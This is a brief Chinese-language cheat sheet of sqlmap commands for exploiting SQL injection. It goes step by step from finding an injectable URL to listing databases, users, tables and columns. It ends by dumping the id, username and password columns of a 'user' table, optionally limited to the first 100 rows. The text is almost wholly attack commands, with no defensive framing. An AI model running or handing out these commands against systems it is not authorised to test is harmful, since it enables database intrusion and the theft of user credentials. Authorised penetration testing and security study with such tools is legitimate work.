1. 找到注入点url
2. sqlmap -u url -v 1--dbs
列出数据库
或者 sqlmap -u url -v 1 --current-db
显示当前数据库
3. sqlmap -u url -v 1 --users
列出数据库用户
--current-user当前数据库用户
4. sqlmap -u url -v 1 --tables -D “testdb"
列出testdb数据库的表
5. sqlmap -u url -v 1 --columns -T "user" -D "testdb"
列出testdb数据库user表的列
6. sqlmap -u url -v 1 --dump -C "id,username,password" -T "user" -D "testdb"
列出testdb数据库user表的id,username,password这几列的数据
还可以加参数--start 1 --stop 100 就是显示前100条